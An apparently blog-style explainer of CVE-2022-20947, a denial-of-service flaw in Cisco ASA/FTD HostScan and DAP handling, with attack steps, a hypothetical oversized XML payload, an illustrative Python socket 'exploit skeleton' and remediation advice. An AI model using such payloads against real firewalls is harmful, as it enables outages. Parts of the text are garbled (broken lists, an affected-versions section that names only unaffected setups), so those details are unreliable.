CVE-2022-20947 - Crashing Cisco ASA and FTD via HostScan DAP Bug—Root Cause and Exploit Explained

On November 16, 2022, Cisco disclosed a critical vulnerability tracked as CVE-2022-20947, affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. If you're managing Cisco security infrastructure, this is a must-know because an unauthenticated remote attacker can crash your firewalls with just specially crafted HostScan data — no password or account needed.

This article will break down CVE-2022-20947 in plain English, explain how it works, review the original advisory, and walk through a hypothetical exploit scenario. We’ll also include code snippets and links to official references so you can dig deeper or patch your devices ASAP.

Official Reference:  
Cisco Security Advisory: cisco-sa-asa-ftd-dap-dos-GhYZBxDU  

What is Dynamic Access Policy (DAP) and HostScan?

Dynamic Access Policy (DAP) lets network admins create rules that control access based on the posture of devices—such as what antivirus they use, if the OS is updated, etc. To collect this info, Cisco uses the HostScan module, which runs on user machines and reports security posture back to the ASA/FTD.

In short:

HostScan collects device security info

- DAP uses that info to allow/deny remote access

Vulnerability Summary

> CVE-2022-20947  
> "Improper processing of HostScan data received from the Posture (HostScan) module in Cisco ASA/FTD lets unauthenticated, remote attackers cause a device reload (crash), leading to a Denial of Service (DoS)."

Bad HostScan data can be submitted by anyone—no authentication needed.

- ASA/FTD does not validate this data properly.

Let’s say a company uses Cisco AnyConnect VPN (which relies on HostScan and DAP). An attacker

1. Finds the public VPN gateway (ASA/FTD device).

Connects as an unauthenticated client via VPN.

3. Sends a specially-crafted HostScan data structure during posture checking. Instead of real posture results, the attacker sends malformed/bogus data.
4. Device tries to process this data, fails, and crashes (reloads). Boom: All users connected to the firewall lose access.

The attacker can *repeat this cycle endlessly to maintain a DoS.*

Crafted HostScan Data: What Does It Look Like?

The exploit hinges on abusing how the firewall parses HostScan data. The Cisco advisory does not reveal exact payloads (to protect customers). But from similar vulnerabilities, we can infer that sending incorrect data lengths, unexpected fields, or invalid types in the data structure can crash the device.

For example, HostScan communicates via XML or JSON data.

Hypothetical Malformed HostScan XML (Example)

<?xml version="1." encoding="UTF-8"?>
<hostscan>
  <property name="os" value="Windows 10"/>
  <property name="av" value="Symantec"/>
  <property name="bogus_field" value="AAAAAAAAAAAAAAAAAAAAAA.... // overly large payload"/>
</hostscan>

A specially crafted *bogus_field* (maybe very long or weird characters) could trigger the crash.

Example Python Exploit Skeleton

This is an illustrative Python snippet showing how an attacker might simulate connection and send malformed HostScan data. Note: For education and defense use only!

import socket

# Connect to VPN port (default: 443 for SSL VPN or 8443)
target = ("vpn.company.com", 443)

malicious_hostscan_data = b"""
<?xml version="1."?>
<hostscan>
  <property name="os" value="Windows 10"/>
  <property name="crashme" value="%s"/>
</hostscan>
""" % (b"A" * 10000) # Oversized value

# A real attack would know protocol details and send proper SSL handshake, etc.
# This is an abstract example.
s = socket.create_connection(target)
s.sendall(malicious_hostscan_data)
s.close()

*In real scenarios, a proof-of-concept would have to mimic the correct AnyConnect/SSL handshake protocol. This snippet is to demonstrate intent, not an out-of-the-box exploit.*

Affected Versions

Per Cisco’s advisory, the following products are affected *if DAP is configured and HostScan is used*:

Devices without DAP enabled

- Devices not using HostScan/Posture

Remediation

Cisco recommends upgrading ASAP.  
Advisory and patched versions:  
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-dap-dos-GhYZBxDU

Restrict remote VPN access to known IPs if possible

- Monitor for unusual HostScan messages / device reloads

Resources & References

- Cisco Security Advisory: cisco-sa-asa-ftd-dap-dos-GhYZBxDU
- Cisco Dynamic Access Policies (DAP) Whitepaper

Conclusion

CVE-2022-20947 is a strong reminder that unauthenticated bugs in security gear can have big consequences. If your Cisco firewalls run DAP with HostScan, prioritize these patches—otherwise an attacker might be able to crash your business in moments, no login or VPN account needed.

Stay safe, and remember: Always keep your security appliances up to date!

Original Advisory:  
Cisco Security Advisory: cisco-sa-asa-ftd-dap-dos-GhYZBxDU

Timeline

Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/21/2022 15:39:00 UTC